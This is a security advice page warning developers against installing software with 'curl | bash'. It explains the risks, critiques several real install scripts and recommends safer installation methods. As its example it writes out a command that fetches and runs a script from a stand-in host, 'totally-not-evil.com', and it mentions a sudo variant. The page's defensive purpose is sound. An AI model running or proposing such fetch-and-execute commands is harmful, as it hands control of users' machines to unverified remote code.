⚠ Security Anti-Pattern

Stop `curl | bash`

You wouldn't run a stranger's code without reading it. Yet every second developer docs page ends with this command.

The Problem

This is the command in question:

$ curl -fsSL https://totally-not-evil.com/install.sh | bash

It downloads a shell script from the internet and immediately executes it. You have no idea what runs. Neither does your team. Neither does your audit log.

Why It's Bad

⚡
Bash starts before the download finishes
The pipe is live. Bash receives and executes lines as they arrive. If your connection drops mid-script, you get partial execution — commands ran, cleanup didn't.
🎭
The server knows you're piping
A server can detect curl's User-Agent or response-read timing and serve different content to a pipe than to a browser. Verifying the script in your browser doesn't mean you ran that script.
🔒
No integrity verification
No checksum, no signature. You're trusting DNS, TLS, the CDN, and the origin server simultaneously. A compromised CDN or BGP hijack serves you malware — silently.
📹
You can't reproduce what ran
The URL is live and mutable. The script changes without notice. There is no record of what exactly executed on your machine — only that something did.
🔑
Add sudo and it's game over
curl ... | sudo bash hands root access to whoever controls that URL at that moment. This pattern appears in real published docs. Often.

From the Wild

Real install scripts, analyzed in June 2026. These are not hypothetical threats.

sudo no checksum get.jetify.com/devbox

Downloads a binary and installs it to /usr/local/bin via sudo with no integrity check. Silently installs a full Nix store (potentially gigabytes) if Nix is absent. Also follows a redirect chain between two domains.

live dev branch no checksum opencode.ai/install

Redirects to a live dev branch on GitHub — no tags, no version pinning. The script changes with every commit. What ran yesterday is not what runs today.

no checksum sudo possible hermes-agent.nousresearch.com/install.sh

Pulls Python 3.11, Node.js, Playwright, and Chromium (~300 MB). May invoke sudo to install system packages via apt or Homebrew. After rm -rf ~/.hermes/, system-level traces remain.

closed CDN no checksum mimo.xiaomi.com/install

Downloads from Xiaomi's internal CDN (mi-fds.com). No public git history, no checksum. You're trusting an opaque proprietary distribution system with no way to verify what you got.

Do This Instead

1. Use a real package manager

The boring option is usually the right one. Package managers handle integrity, updates, and uninstallation.

# macOS
$ brew install sometool

# Ubuntu / Debian
$ sudo apt install sometool

# Node
$ npm install -g sometool

2. Download, inspect, then run

One extra step. Gives you a chance to read the script and keeps a local copy for future reference.

$ curl -fsSL https://example.com/install.sh -o install.sh
$ cat install.sh # actually read it
$ bash install.sh

3. Log everything that executes

If you must pipe — record what ran so you can audit or undo later.

$ curl -fsSL https://example.com/install.sh | bash -x 2>&1 | tee install.log

Caveat bash -x traces top-level commands only. Subprocesses and sourced scripts won't appear in the log.

4. Verify the checksum

If the project publishes a SHA-256 hash, verify it before running. Non-negotiable on production machines.

$ curl -fsSL https://example.com/install.sh -o install.sh
$ echo "abc123…expectedhash install.sh" | sha256sum -c
install.sh: OK
$ bash install.sh